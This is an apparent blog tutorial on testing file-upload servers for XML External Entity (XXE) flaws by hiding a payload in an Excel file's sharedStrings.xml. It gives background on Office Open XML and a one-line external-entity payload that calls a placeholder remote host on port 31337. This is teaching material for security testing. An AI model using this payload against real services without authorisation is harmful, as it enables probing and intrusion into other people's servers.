From my last article, we can exploit XXE using Docx file. Now lets build exploit XXE vulnerability using Excel file.
Exploit XXE Vulnerability Using Excel File?
Microsoft released OOXML Document, OOXML Presentation and OOXML Workbook in 7 December 2006. Source: Wikipedia.
So, what is Office Open XML?
Office Open XML, also known as OpenXML or OOXML, is an XML-based format for office documents, including word processing documents, spreadsheets, presentations, as well as charts, diagrams, shapes, and other graphical material. The specification was developed by Microsoft and adopted by ECMA International as ECMA-376 in 2006. A second version was released in December, 2008, and a third version of the standard released in June, 2011. The specification has been adopted by ISO and IEC as ISO/IEC 29500. Source: officeopenxml.com
Enough for the intro..
First, create an Excel file (just like before, i am using LibreOffice), save it as xlsx extension and extract the xlsx file.
Here the contents of the files:
All we have to do is put our exploit into file sharedStrings.xml.
Here is the exploit i used.
<!DOCTYPE pv8 [ <!ELEMENT pv8 ANY > <!ENTITY pv8xxe SYSTEM "http://xxx.xxx.xxx.xxx:31337/">]> <pv8>&pv8xxe;</pv8>
You can upload it into file sharing server to test the vulnerability. 🙂